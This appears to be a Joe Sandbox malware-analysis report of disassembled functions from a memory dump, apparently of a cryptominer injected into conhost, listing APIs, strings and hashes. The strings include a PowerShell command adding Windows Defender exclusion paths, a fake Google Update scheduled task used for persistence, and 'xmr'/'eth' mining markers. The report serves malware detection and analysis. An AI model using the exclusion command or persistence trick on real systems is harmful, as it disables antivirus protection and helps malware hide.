Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: memsetwcsncmp
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$\BaseNamedObjects\exwrdtlzvhyfkapm$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineQC$eth
API String ID: 1181335886-2299294724
Opcode ID: 28dea6677d6af6e9e95845f5514427c3b51d91342b07da60c88b8e210e45b96c
Instruction ID: 1c26f5b83bae4ab0d282087d8ee202659e0c8bd52fd834ca37433a97c033e569
Opcode Fuzzy Hash: 28dea6677d6af6e9e95845f5514427c3b51d91342b07da60c88b8e210e45b96c
Instruction Fuzzy Hash: 0001CC6371C641C1E220E656B8047EA6661ABCA7D0F584235FECD43BE9CE7DD14AC709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB432A60 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6EB432A8C

Strings

0, xrefs: 00007FF6EB432AB8
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB432A61

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: wcslen
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0
API String ID: 4088430540-185994389
Opcode ID: e795708a5df462652d0551e73006b2b1453d33a804765f62acec034eb067b61c
Instruction ID: cad8e45054dc8db055259cceae3b5e6d0d802bc4690e674bbd81872a8b834bca
Opcode Fuzzy Hash: e795708a5df462652d0551e73006b2b1453d33a804765f62acec034eb067b61c
Instruction Fuzzy Hash: AF010022618680C2E7109B50F84479AB730EF88368F680321FA9C46AA9DF7EC4858B40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6EB43DB93 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00007FF6EB43DBFD
signal.MSVCRT ref: 00007FF6EB43DC49
signal.MSVCRT ref: 00007FF6EB43DC62
signal.MSVCRT ref: 00007FF6EB43DD6A

Strings

CCG , xrefs: 00007FF6EB43DBB5

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 6876174941ad4ec12815e2c7e3bb31e6968b41551a664edfa185aefccb2c1aa8
Instruction ID: 3f943d0eda2b93d2e315e2ab79f2f3906678a900fee34f26676af9c61d946822
Opcode Fuzzy Hash: 6876174941ad4ec12815e2c7e3bb31e6968b41551a664edfa185aefccb2c1aa8
Instruction Fuzzy Hash: 28416153E29102C5FB7825694C5837810955F8E724F2C8635D62DD73FECDAEA899430B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB431EB0 Relevance: 37.2, APIs: 9, Strings: 12, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF6EB431F3B
wcslen.MSVCRT ref: 00007FF6EB4320A0
memcpy.MSVCRT ref: 00007FF6EB4320BF
memcpy.MSVCRT ref: 00007FF6EB4320E0
wcslen.MSVCRT ref: 00007FF6EB432353

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF6EB4320B1
ATI, xrefs: 00007FF6EB4327A2
ProviderName, xrefs: 00007FF6EB432447
NVIDIA, xrefs: 00007FF6EB432696
\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\, xrefs: 00007FF6EB431EF9
ProviderName, xrefs: 00007FF6EB43234C
PROGRAMFILES=, xrefs: 00007FF6EB431EB6
$0', xrefs: 00007FF6EB4326BC
Advanced Micro Devices, xrefs: 00007FF6EB43290C
AMD, xrefs: 00007FF6EB43271C
@, xrefs: 00007FF6EB432499
0, xrefs: 00007FF6EB43256C

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0'$0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$PROGRAMFILES=$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
API String ID: 1844840824-1551673046
Opcode ID: d99a732c2a3e7007cd77da4755ffa5225d60b89d39819dd4311c1d68ce849dda
Instruction ID: 4b08029d4179bab525908b2c7d4045ce83fb2ca9960713aa4624bd5e4485182f
Opcode Fuzzy Hash: d99a732c2a3e7007cd77da4755ffa5225d60b89d39819dd4311c1d68ce849dda
Instruction Fuzzy Hash: AA524F22D2DE86D5F7129B29B4413B57360AF99384F045231D98C9A27DEF6FA18DC30E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43EE60 Relevance: 31.7, APIs: 21, Instructions: 232
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF6EB43EE7B
memcpy.MSVCRT ref: 00007FF6EB43EE9B
malloc.MSVCRT ref: 00007FF6EB43EEB5
memset.MSVCRT ref: 00007FF6EB43EEDF
abort.MSVCRT ref: 00007FF6EB43EEF2
CreateSemaphoreW.KERNEL32 ref: 00007FF6EB43EF1B
TlsAlloc.KERNEL32 ref: 00007FF6EB43EF28
GetLastError.KERNEL32 ref: 00007FF6EB43EF50
abort.MSVCRT ref: 00007FF6EB43EF58

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
String ID:
API String ID: 342303811-0
Opcode ID: fa805e2e043a57f1a4382e6835309b82e00402617c77c5849f89fd4ba56e01b2
Instruction ID: 855055335c4aad8f2dc5dd08e2b1a5d0dbcb2857b875db6e7f881774720e4373
Opcode Fuzzy Hash: fa805e2e043a57f1a4382e6835309b82e00402617c77c5849f89fd4ba56e01b2
Instruction Fuzzy Hash: 68918233A0A602D5EA54AF55F80877922A1AF5CB84F584135DD4D873BCDF3EE85AC30A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB447710 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00007FF6EB44780C

Part of subcall function 00007FF6EB43D120: strlen.MSVCRT ref: 00007FF6EB43D1A5
Part of subcall function 00007FF6EB43D120: memcpy.MSVCRT ref: 00007FF6EB43D1BE
Part of subcall function 00007FF6EB43D120: free.MSVCRT ref: 00007FF6EB43D1C9

fwrite.MSVCRT ref: 00007FF6EB447788
fputs.MSVCRT ref: 00007FF6EB4477A2
fwrite.MSVCRT ref: 00007FF6EB4477C3
free.MSVCRT ref: 00007FF6EB4477D3
fputs.MSVCRT ref: 00007FF6EB4477E5
abort.MSVCRT ref: 00007FF6EB447811
fwrite.MSVCRT ref: 00007FF6EB447836
abort.MSVCRT ref: 00007FF6EB44783B
fwrite.MSVCRT ref: 00007FF6EB447876
fputs.MSVCRT ref: 00007FF6EB447888
fputc.MSVCRT ref: 00007FF6EB44789C

Strings

terminate called without an active exception, xrefs: 00007FF6EB447802
terminate called after throwing an instance of ', xrefs: 00007FF6EB44777E
what(): , xrefs: 00007FF6EB44786F
terminate called recursively, xrefs: 00007FF6EB44782C

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 802779101-808685626
Opcode ID: 45f9f7f635192745baf892d2912285d2392f706606ddb2a48e73b66195d1f404
Instruction ID: 15cf60ff800218d17893ad6bebc0b2dafae2138ae4e10b90ed2f2121a0ce5c58
Opcode Fuzzy Hash: 45f9f7f635192745baf892d2912285d2392f706606ddb2a48e73b66195d1f404
Instruction Fuzzy Hash: C1419C12B0911286FB10BFB1A8157B916519F8EB80F44403AD90D977EBDD2FE92B870B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43E910 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32 ref: 00007FF6EB43E9DE
abort.MSVCRT(?,?,?,?,?,?,00000060,?,?,?,00000000,00000000,00007FF6EB448595), ref: 00007FF6EB43E9E4
RtlUnwindEx.KERNEL32 ref: 00007FF6EB43EAFD

Strings

CCG!, xrefs: 00007FF6EB43E9D1
CCG , xrefs: 00007FF6EB43E977
CCG!, xrefs: 00007FF6EB43E93A
CCG", xrefs: 00007FF6EB43E949

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: a3529a06544cebd43370817810ae69c06a1e571193dfec8cfc19c397a4d2ad1e
Instruction ID: 5311cb1c574ebe7a4bb3334338c3b51ef46c43a9079437bfb817015990621adc
Opcode Fuzzy Hash: a3529a06544cebd43370817810ae69c06a1e571193dfec8cfc19c397a4d2ad1e
Instruction Fuzzy Hash: 9A51BD33A09A81C2E7608B19F4487AA7370FB99B94F544236EE8D53768CF3AD585C709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43C300 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncmp.MSVCRT ref: 00007FF6EB43C344
strlen.MSVCRT ref: 00007FF6EB43C44E

Strings

Z, xrefs: 00007FF6EB43C518
_GLOBAL_, xrefs: 00007FF6EB43C33D
Z, xrefs: 00007FF6EB43C3A7
_, xrefs: 00007FF6EB43C399
_, xrefs: 00007FF6EB43C6DC
_, xrefs: 00007FF6EB43C50B

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: strlenstrncmp
String ID: Z$Z$_$_$_$_GLOBAL_
API String ID: 1310274236-662103887
Opcode ID: a69b931b51665080fc1721cecb62a3bc337328209a6b0fe8bd687cd3b048f661
Instruction ID: 230f35d941d21f825539f7d1e8f7057cc62fbc731bb9e5b1bbf647c35269aca9
Opcode Fuzzy Hash: a69b931b51665080fc1721cecb62a3bc337328209a6b0fe8bd687cd3b048f661
Instruction Fuzzy Hash: 70E1F373A08792C9F7208F3594087FD3BA1AB08758F484131DE5C9A7AADF3ED64A8745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D560 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF6EB43D67B

Strings

Address %p has no image-section, xrefs: 00007FF6EB43D5D5, 00007FF6EB43D7B2
VirtualProtect failed with code 0x%x, xrefs: 00007FF6EB43D752
Mingw-w64 runtime failure:, xrefs: 00007FF6EB43D597
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6EB43D79C

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 88956ce89939d000d67cdc8f673eeeffce422bf18eb6756d626909256d4f2578
Instruction ID: 687c9a463143f2857c85fad9eb46ca66714420fa68c152c30b218f805b0b84b4
Opcode Fuzzy Hash: 88956ce89939d000d67cdc8f673eeeffce422bf18eb6756d626909256d4f2578
Instruction Fuzzy Hash: 8C61DC33A09A02D6EA109F55E8443B977A0BB4CB94F484134DE5C977B8DF3EE599C309

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB441660 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

fwprintf.MSVCRT ref: 00007FF6EB4417AC

Strings

%.*S, xrefs: 00007FF6EB4417CA
%*.*S, xrefs: 00007FF6EB4417A5
%-*.*S, xrefs: 00007FF6EB4417DE

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fwprintf
String ID: %*.*S$%-*.*S$%.*S
API String ID: 968622242-2115465065
Opcode ID: 832a17fc87ff0e15ae0bc2a97249034f62b04abca9fe126b68f3f48ac58e4fff
Instruction ID: 615b49d3cb88f0efb4f95d88f9a694bea9339fd5acbd0b6ec64ca3bf4b0ff074
Opcode Fuzzy Hash: 832a17fc87ff0e15ae0bc2a97249034f62b04abca9fe126b68f3f48ac58e4fff
Instruction Fuzzy Hash: 7541DDB3B18542C6F7508E29D4007796AA19B89BD4F18C135DF4C876EDDE3EE41B870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB441910 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF6EB441A5D
%-*.*s, xrefs: 00007FF6EB441A71
%*.*s, xrefs: 00007FF6EB441A3A
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB441913

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
API String ID: 0-4000767721
Opcode ID: 4bd7f888997f1428eafd362586e12aa8852761755f39c9c26afa5e9e84c0920f
Instruction ID: 0ae9f22d071386b2a6bd7074083d1bab3d2ac70a13bc1082a2ddbf91035c46e5
Opcode Fuzzy Hash: 4bd7f888997f1428eafd362586e12aa8852761755f39c9c26afa5e9e84c0920f
Instruction Fuzzy Hash: 9241CAB3A08246C6E7509E25C4007797BA0EF48798F18C135CE4D866EDDE3EE42ACB16

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB432D80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6EB432D96
wcscpy.MSVCRT ref: 00007FF6EB432E0E

Strings

eth, xrefs: 00007FF6EB432D89
\BaseNamedObjects\exwrdtlzvhyfkapm, xrefs: 00007FF6EB432D86
xmr, xrefs: 00007FF6EB432D82

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: wcscpywcslen
String ID: \BaseNamedObjects\exwrdtlzvhyfkapm$eth$xmr
API String ID: 225642448-1773558661
Opcode ID: 7c18e1d428280e2747470cd5def9a742f52c0f2b5d66f3f326576d4d2a1232b9
Instruction ID: 5920cdd89c1ceaf075a96220a341596d031455aedab68939c363c84460120d54
Opcode Fuzzy Hash: 7c18e1d428280e2747470cd5def9a742f52c0f2b5d66f3f326576d4d2a1232b9
Instruction Fuzzy Hash: C131E723608241D5E6209F11A4093BA76A0FB8D7A4F884635EE5C827FDEF3EE04D8709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB432BB0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6EB432BD4
wcscpy.MSVCRT ref: 00007FF6EB432C82
wcscat.MSVCRT ref: 00007FF6EB432C8D
wcslen.MSVCRT ref: 00007FF6EB432C9E

Strings

\??\, xrefs: 00007FF6EB432C78

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: \??\
API String ID: 468205783-3047946824
Opcode ID: bd374edfa0390df58b4f4020f654e493c944218ec62c4d8a60d6fd753a781144
Instruction ID: 91bc46374053170d0188c1167bf23d449420ec1c3e2498209a6470c08028db97
Opcode Fuzzy Hash: bd374edfa0390df58b4f4020f654e493c944218ec62c4d8a60d6fd753a781144
Instruction Fuzzy Hash: CC31AF22A19B86C4F7149F75E8153793360AF5D394F044235DA8C9A3BDEF7EA089830E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D7D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF6EB455A18,00007FF6EB455A10,00007FF6EB454EE0,00007FFDB240ADA0,?,?,?,00000001,00007FF6EB43124C), ref: 00007FF6EB43D98D

Part of subcall function 00007FF6EB43D5D0: VirtualQuery.KERNEL32 ref: 00007FF6EB43D67B

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF6EB43DB0A
Unknown pseudo relocation protocol version %d., xrefs: 00007FF6EB43DB32
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6EB43DB23

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 1027372294-1286557213
Opcode ID: 17fb590d4bf6312f56afb5f126a8fda7ea48e215cf51e2478acf702bcb2b2b33
Instruction ID: d73fb5c27d2fd4a43f2aa13b0875abbf846e0bfdcfbd9e6da2172669011f8795
Opcode Fuzzy Hash: 17fb590d4bf6312f56afb5f126a8fda7ea48e215cf51e2478acf702bcb2b2b33
Instruction Fuzzy Hash: 9F91D123F09A42C5EB20AB2599087792260BF4D794F184231CD2DA77FCDE3EE549C71A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D120 Relevance: 6.3, APIs: 5, Instructions: 95stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6EB43D1A5
